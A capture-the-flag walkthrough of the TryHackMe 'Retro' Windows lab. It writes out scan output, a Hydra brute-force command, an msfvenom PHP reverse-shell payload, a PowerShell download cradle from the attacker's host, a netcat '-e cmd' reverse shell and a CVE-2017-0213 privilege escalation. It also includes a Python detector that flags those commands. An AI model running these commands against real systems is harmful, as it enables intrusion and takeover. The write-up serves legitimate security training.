Retro THM{}
Nmap
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2022-04-06T16:54:22
|_Not valid after: 2022-10-06T16:54:22
|_ssl-date: 2022-04-07T17:05:49+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETROWEB
| NetBIOS_Domain_Name: RETROWEB
| NetBIOS_Computer_Name: RETROWEB
| DNS_Domain_Name: RetroWeb
| DNS_Computer_Name: RetroWeb
| Product_Version: 10.0.14393
|_ System_Time: 2022-04-07T17:05:49+00:00
Gobuster
http://10.10.228.64/retro/wp-login.php WORDPRESS LOGIN
http://10.10.228.64/retro/wp-content/ WHITE
http://10.10.228.64/retro/wp-includes/ FORBIDDEN
Wpscan
http://10.10.228.64/retro/index.php/wp-json/wp/v2/users/ USER "wade"
Hydra
hydra -l wade -P /usr/share/wordlists/rockyou.txt.gz 10.10.228.64 http-form-post '/retro/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=%2Fretro%2Fwp-admin%2F&testcookie=1:The password you entered for the username' -V
Does not work
Webpage comments
In the webpage's comments, we find this:
Leaving myself a note here just in case I forget how to spell it: parzival
So, knowing that the user is wade, we try wade:parzival and can connect to the administration panel.
Method 1. Using RDP
We can connect to the remote machine through RDP using the obtained credentials.
xfreerdp /p:'parzival' /u:'Wade' /v:10.10.228.64
Now we have the first flag.
Method 2. WordPress to shell
Like in Mr Robot and Internal, we can obtain a reverse shell by uploading a .php file.
This time the pentestmonkey shell does not work, so we need to use one created with msfvenom.
- We follow the first method of https://www.hacknos.com/wordpress-shell-upload/ , taking into account that the upload folder is the current year and month.
- To create the payload, we can use this resource: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ , choosing the php one.
msfvenom -p php/reverse_php LHOST=10.11.62.63 LPORT=4444 -f raw > shell1.php
Winpeas
- We transfer the file
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.62.63:8000/Winpeas.exe', 'C:\Users\Wade\Winpeas.exe')"
- We transfer nc.exe using the same method
- Start nc on the host
nc -lnvp 5555
- Connect to our host
nc64.exe 10.11.62.63 5555 -e cmd
- Execute Winpeas
In case we have RDP, we transfer Winpeas and write this on cmd: REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1. After that, open another CMD and execute Winpeas.
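From the defender's side, the steps above leave a recognisable trail in process command lines. As an added example (not part of the original writeup), this small detector runs over constructed command lines modelled on those steps, flags the WebClient download cradle, the nc -e reverse shell and the VirtualTerminalLevel registry change, and correlates the download source with the reverse-shell destination. The sample lines and rule names are my own.

```python
import re

# Constructed sample command lines modelled on the steps above; not real telemetry.
SAMPLE_COMMAND_LINES = [
    "powershell -c \"(new-object System.Net.WebClient).DownloadFile("
    "'http://10.11.62.63:8000/Winpeas.exe', 'C:\\Users\\Wade\\Winpeas.exe')\"",
    "nc64.exe 10.11.62.63 5555 -e cmd",
    "REG ADD HKCU\\Console /v VirtualTerminalLevel /t REG_DWORD /d 1",
    "powershell -c \"Get-ChildItem C:\\Users\\Wade\"",  # benign control line
]

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"

# Each rule is a case-insensitive regex; rules that involve a remote host
# capture it in the named group "ip" so hits can be correlated later.
RULES = {
    "webclient_download_cradle": re.compile(
        r"new-object\s+System\.Net\.WebClient\)\.DownloadFile\(\s*'https?://(?P<ip>" + IPV4 + ")", re.I),
    "netcat_reverse_shell": re.compile(
        r"\bnc(?:64)?(?:\.exe)?\s+(?P<ip>" + IPV4 + r")\s+\d{1,5}\s+-e\s+(?:cmd|powershell)", re.I),
    "console_vt_enable": re.compile(
        r"\breg\s+add\s+HKCU\\Console\s+/v\s+VirtualTerminalLevel\b", re.I),
}


def match_rules(cmdline):
    """Return {rule_name: remote_ip_or_None} for every rule that fires on one command line."""
    hits = {}
    for name, pattern in RULES.items():
        m = pattern.search(cmdline)
        if m:
            hits[name] = m.groupdict().get("ip")
    return hits


def triage(cmdlines):
    """Apply the rules to a batch of command lines.

    Returns (per_line_hits, correlated_ips): per_line_hits is one dict per input
    line; correlated_ips lists hosts that both served a download and received a
    reverse shell, which is a much stronger signal than either hit alone.
    """
    per_line = [match_rules(c) for c in cmdlines]
    download_ips = {h["webclient_download_cradle"] for h in per_line if "webclient_download_cradle" in h}
    shell_ips = {h["netcat_reverse_shell"] for h in per_line if "netcat_reverse_shell" in h}
    return per_line, sorted(download_ips & shell_ips)


if __name__ == "__main__":
    hits, correlated = triage(SAMPLE_COMMAND_LINES)
    for line, h in zip(SAMPLE_COMMAND_LINES, hits):
        print(h or "clean", "<-", line[:60])
    print("download source also used as reverse-shell target:", correlated)
```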
CVE-2019-1388 Exploit
If we dig into the bin, we find a file named hhupd. Also, there is a bookmark in the Chrome browser referring to CVE-2019-1388.
CVE-2017-0213 Exploit
This is another vulnerability that is much easier to exploit, so this is the one we will follow.
This vulnerability is not shown in the WinPEAS scan, so to discover it we need to check the version/build:
systeminfo
Microsoft Windows Server 2016 Standard 10.0.14393 N/A Build 14393
Searching on Google, we find the available exploit: https://steflan-security.com/tryhackme-retro-walkthrough/
We transfer the exploit to the Windows machine and execute it. A new window appears and now we are nt authority\system.